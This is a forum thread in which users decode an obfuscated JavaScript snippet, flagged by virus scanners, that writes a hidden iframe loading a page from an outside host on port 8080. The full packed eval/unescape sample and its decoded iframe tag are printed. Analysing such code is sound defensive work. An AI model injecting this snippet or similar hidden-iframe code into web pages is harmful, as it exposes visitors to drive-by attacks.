Sign In

Subscribe

Dangerous javascript code?

Posted By: ZippyV | Jun 23rd @ 4:24 AM

ZippyV
Fired Up

Here is a snippet of code I found on some website that virusscanners are complaining about. Can anyone find out what it does?

eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c])}}return p}('s.r(q(\'%l%1%m%3%e%n%2%6%c%3%i%a%9%4%0%0%d%f%b%b%0%g%3%3%2%8%0%g%3%2%e%i%0%g%3%j%8%2%0%f%h%5%h%5%b%1%8%7%2%w%j%d%4%d%9%6%y%1%7%0%4%a%x%5%5%6%4%2%1%u%4%0%a%5%6%c%0%p%k%2%a%9%v%1%c%1%t%1%k%1%0%p%f%6%4%1%7%7%2%8%9%o%l%b%1%m%3%e%n%2%o\'));',35,35,'u0074|u0069|u0065|u0072|u0068|u0030|u0020|u0064|u006e|u0022|u003d|u002f|u0073|u0070|u0061|u003a|u006f|u0038|u0063|u002e|u006c|u003c|u0066|u006d|u003e|u0079|unescape|write|document|u0062|u0067|u0076|u0078|u0031|u0077'.split('|')))

TommyCarlier
I want my scalps!

It opens a hidden IFRAME to http://torrentoreactor.net:8080/index.php

ZippyV
Fired Up

In reply to TommyCarlier

#Jun 23rd @ 4:37 AM

Do you get any content from torrentoreactor?

TommyCarlier
I want my scalps!

In reply to ZippyV

#Jun 23rd @ 4:40 AM

I haven't executed the code. I just evaluated the expression inside the eval-function in my head. Honestly Wink

ZippyV
Fired Up

In reply to TommyCarlier

#Jun 23rd @ 5:11 AM

You mean <head>

TommyCarlier
I want my scalps!

In reply to ZippyV

#Jun 23rd @ 5:29 AM

function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c])}}return p}('s.r(q(\'%l%1%m%3%e%n%2%6%c%3%i%a%9%4%0%0%d%f%b%b%0%g%3%3%2%8%0%g%3%2%e%i%0%g%3%j%8%2%0%f%h%5%h%5%b%1%8%7%2%w%j%d%4%d%9%6%y%1%7%0%4%a%x%5%5%6%4%2%1%u%4%0%a%5%6%c%0%p%k%2%a%9%v%1%c%1%t%1%k%1%0%p%f%6%4%1%7%7%2%8%9%o%l%b%1%m%3%e%n%2%o\'));',35,35,'u0074|u0069|u0065|u0072|u0068|u0030|u0020|u0064|u006e|u0022|u003d|u002f|u0073|u0070|u0061|u003a|u006f|u0038|u0063|u002e|u006c|u003c|u0066|u006d|u003e|u0079|unescape|write|document|u0062|u0067|u0076|u0078|u0031|u0077'.split('|')) evaluates to document.write(unescape('%u003c%u0069%u0066%u0072%u0061%u006d%u0065%u0020%u0073%u0072%u0063%u003d%u0022%u0068%u0074%u0074%u0070%u003a%u002f%u002f%u0074%u006f%u0072%u0072%u0065%u006e%u0074%u006f%u0072%u0065%u0061%u0063%u0074%u006f%u0072%u002e%u006e%u0065%u0074%u003a%u0038%u0030%u0038%u0030%u002f%u0069%u006e%u0064%u0065%u0078%u002e%u0070%u0068%u0070%u0022%u0020%u0077%u0069%u0064%u0074%u0068%u003d%u0031%u0030%u0030%u0020%u0068%u0065%u0069%u0067%u0068%u0074%u003d%u0030%u0020%u0073%u0074%u0079%u006c%u0065%u003d%u0022%u0076%u0069%u0073%u0069%u0062%u0069%u006c%u0069%u0074%u0079%u003a%u0020%u0068%u0069%u0064%u0064%u0065%u006e%u0022%u003e%u003c%u002f%u0069%u0066%u0072%u0061%u006d%u0065%u003e')); and the unescape-function evaluates to <iframe src="http://torrentoreactor.net:8080/index.php" width=100 height=0 style="visibility: hidden"></iframe>

Ion Todirel
buuu

nevermind

What you are watching
- C9 Conversations: Brian Beckman on Complexity
- ASP.NET Webcast Teil 4: Durchg…, Themes und Skins, Navigation
Active Forum Threads
- anyone having an Envy 13?
  
  Forum: The Coffeehouse
  
  Posted By: Ion Todirel
  
  Nov 27th @ 9:46 PM
  
  Comments: 0
- C9 Guy
  
  Forum: Site Feedback
  
  Posted By: JoshRoss
  
  Nov 27th @ 9:10 PM
  
  Comments: 0
- Life
  
  Forum: The Coffeehouse
  
  Posted By: Titan
  
  Nov 27th @ 6:03 PM
  
  Comments: 3

Channel 9: C9 Conversations: Brian Beckman on Complexity [C9 Conversations: Brian Beckman on Complexity]
Channel 10: Black Friday Deals on Windows 7 Machines
Channel 10: Holiday Shopping on Bing Cashback = Big Online Savings
Channel 10: Black Friday Deals at the Microsoft Store
Channel 10: Incredible Black Friday Deal: Windows 7 Notebook for $197
ASP.NET: Presenting in Europe Next Week
TechNet Edge: AlignIT IT Manager Podcast #30 - Straight Talk about Windows 7
WindowsClient: You know your post rate has gone down...
Silverlight: Geek Profiles – Scott Guthrie
Channel 9: C9 Lectures: Dr. Erik Meijer - Functional Programming Fundamentals Chapter 9 of 13
TechNet Edge: Managing Your Virtual World - Tech Focus November 2009 Part 2
ASP.NET: Silverlight and RIA Services: Implementing Search
Channel 9: C9 Lectures: Brian Beckman - Covariance and Contravariance in Physics 1 of 1
Channel 9: Set Your Data Free
Channel 9: Implementing a Silverlight SharePoint WebPart with Visual Studio 2010
WindowsClient: New WPF Showcase Addition: Enterprise
Channel 9: Reactive Extensions API in depth: Contract
WindowsClient: Concluding "New WPF Features" Series
WindowsClient: Introduction to TestApi – Part 5: Managed Code Fault Injection APIs
ASP.NET: T4MVC now has a real home and a dedicated forum!
close

Microsoft Communities